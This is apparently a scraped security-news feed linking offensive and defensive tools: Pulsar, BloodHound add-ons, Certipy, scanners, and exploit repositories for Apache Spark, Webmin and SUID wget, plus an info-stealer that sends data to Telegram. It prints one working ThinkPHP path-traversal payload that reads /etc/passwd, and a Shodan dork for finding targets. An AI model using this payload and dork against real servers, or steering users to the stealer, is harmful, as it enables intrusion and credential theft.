Open Sourcing Pulsar, the Runtime Security Observability Tool for IoT, Powered by eBPF
blog.exein.io/pulsar
Tool website: pulsar.sh
GitHub: github.com/exein-io/pulsar
blog.exein.io/pulsar
Tool website: pulsar.sh
GitHub: github.com/exein-io/pulsar
blog.exein.io
Open Sourcing Pulsar, the Runtime Security Observability Tool for IoT | Exein Blog
Fleet of Pulsar devices
Reading an arbitrary ThinkPHP 5.X file
Nuclei Template :https://github.com/momika233/TP5_Arbitrary_file_read/blob/main/TP5_Arbitrary_file_read.yaml
PoCs: {{BaseURL}}/?s=index/think\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../etc/passwd
Dork for Shodan: "X-Powered By: ThinkPHP"
Nuclei Template :https://github.com/momika233/TP5_Arbitrary_file_read/blob/main/TP5_Arbitrary_file_read.yaml
PoCs: {{BaseURL}}/?s=index/think\\Error/appError&errno=1&errstr=1&errline=1&errfile=../../../etc/passwd
Dork for Shodan: "X-Powered By: ThinkPHP"
GitHub
TP5_Arbitrary_file_read/TP5_Arbitrary_file_read.yaml at main · momika233/TP5_Arbitrary_file_read
Contribute to momika233/TP5_Arbitrary_file_read development by creating an account on GitHub.
A standalone noscript that adds information about unpatched vulnerabilities to BloodHound based on parsed vulnerability scanners reports. Security teams can then use this data to define starting points for paths (e.g. paths to Domain Admins from vulnerable hosts) or write queries that consider lateral movement to vulnerable hosts.
Supported Scanners
Tenable Nessus
Qualys
Greenbone OpenVAS
Nmap Vuln NSE Script
https://github.com/zeronetworks/BloodHound-Tools/tree/main/VulnerabilitiesDataImport
Supported Scanners
Tenable Nessus
Qualys
Greenbone OpenVAS
Nmap Vuln NSE Script
https://github.com/zeronetworks/BloodHound-Tools/tree/main/VulnerabilitiesDataImport
GitHub
BloodHound-Tools/VulnerabilitiesDataImport at main · zeronetworks/BloodHound-Tools
Collection of tools that reflect the network dimension into Bloodhound's data - zeronetworks/BloodHound-Tools
Stealer in just 3 lines with sending to telegram
https://github.com/FallenAstaroth/stink
https://github.com/FallenAstaroth/stink
GitHub
GitHub - FallenAstaroth/stink: Nulla eu sem non metus ullamcorper feugiat. Proin eget magna eu massa pretium pharetra.
Nulla eu sem non metus ullamcorper feugiat. Proin eget magna eu massa pretium pharetra. - FallenAstaroth/stink
Apache Spark Shell Command Injection CVE-2022-33891
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
https://github.com/AmoloHT/CVE-2022-33891
#Apache #spark
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
https://github.com/AmoloHT/CVE-2022-33891
#Apache #spark
GitHub
GitHub - AmoloHT/CVE-2022-33891: 「💥」CVE-2022-33891 - Apache Spark Command Injection
「💥」CVE-2022-33891 - Apache Spark Command Injection - AmoloHT/CVE-2022-33891
CVE-2022-26712: The POC for SIP-Bypass
https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/
https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/
jhftss.github.io
CVE-2022-26712: The POC for SIP-Bypass Is Even Tweetable
I found some new attack surfaces in the macOS PackageKit.framework, and successfully disclosed 15+ critical SIP-Bypass vulnerabilities. Apple has addressed 12 of them with CVE assigned so far. There are still some reports in the Apple’s processing queue.…
wget-root :
If the wget binary has the SUID bit set, It does not drop the elevated privileges and may be abused to access the file system. It may be used to do privileged writes or write files outside a restricted file system. This noscript automates the rewriting of the passwd file of the victim's machine.
https://github.com/CopernicusPY/wget-root
If the wget binary has the SUID bit set, It does not drop the elevated privileges and may be abused to access the file system. It may be used to do privileged writes or write files outside a restricted file system. This noscript automates the rewriting of the passwd file of the victim's machine.
https://github.com/CopernicusPY/wget-root
GitHub
GitHub - lil-skelly/wget-root: This is a python noscript that exploits wget when being set with a SUID bit, and overwrites the root…
This is a python noscript that exploits wget when being set with a SUID bit, and overwrites the root password. - lil-skelly/wget-root
Apache Tomcat Vulnerability Scanner:
https://github.com/p0dalirius/ApacheTomcatScanner
https://github.com/p0dalirius/ApacheTomcatScanner
GitHub
GitHub - p0dalirius/ApacheTomcatScanner: A python noscript to scan for Apache Tomcat server vulnerabilities.
A python noscript to scan for Apache Tomcat server vulnerabilities. - GitHub - p0dalirius/ApacheTomcatScanner: A python noscript to scan for Apache Tomcat server vulnerabilities.
Powershell noscript that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines.
https://github.com/last-byte/PersistenceSniper/
https://github.com/last-byte/PersistenceSniper/
GitHub
GitHub - last-byte/PersistenceSniper: Powershell module that can be used by Blue Teams, Incident Responders and System Administrators…
Powershell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. Official Twitter/X account @PersistSniper. Made w...
Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more!
https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
https://github.com/ly4k/Certipy
https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
https://github.com/ly4k/Certipy
Medium
Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more!
A new version of Certipy has been released along with a forked BloodHound GUI that has PKI support! In this blog post, we will look at…
This noscript allows to find MySQLi vulnerabilities Based on Errors with nuclei
https://github.com/HernanRodriguez1/ScanMySQLiErrorBased-Nuclei
https://github.com/HernanRodriguez1/ScanMySQLiErrorBased-Nuclei
GitHub
GitHub - HernanRodriguez1/ScanMySQLiErrorBased-Nuclei
Contribute to HernanRodriguez1/ScanMySQLiErrorBased-Nuclei development by creating an account on GitHub.
PersistAssist is a fully modular persistence framework written in C#. All persistence techniques contain a cleanup method which will server to remove the persistence aside from the persistence code. This is a WIP so there are many empty classes, the main object of this project initially was to build out a fully modular framework meant to make adding new features as simple as inheriting a class and adding the code.
https://github.com/FortyNorthSecurity/PersistAssist
https://github.com/FortyNorthSecurity/PersistAssist
GitHub
GitHub - RedSiege/PersistAssist: Fully modular persistence framework
Fully modular persistence framework. Contribute to RedSiege/PersistAssist development by creating an account on GitHub.
A Python noscript to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin < 1.997
for mitigation Update to Webmin >= 1.997
https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE
#webmin #rce
for mitigation Update to Webmin >= 1.997
https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE
#webmin #rce
GitHub
GitHub - p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE: A Python noscript to exploit CVE-2022-36446 Software Package…
A Python noscript to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin < 1.997. - p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE
An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022.
https://github.com/advanced-threat-research/DotDumper
#unpacker #DotNet
https://github.com/advanced-threat-research/DotDumper
#unpacker #DotNet
GitHub
GitHub - advanced-threat-research/DotDumper: An automatic unpacker and logger for DotNet Framework targeting files
An automatic unpacker and logger for DotNet Framework targeting files - advanced-threat-research/DotDumper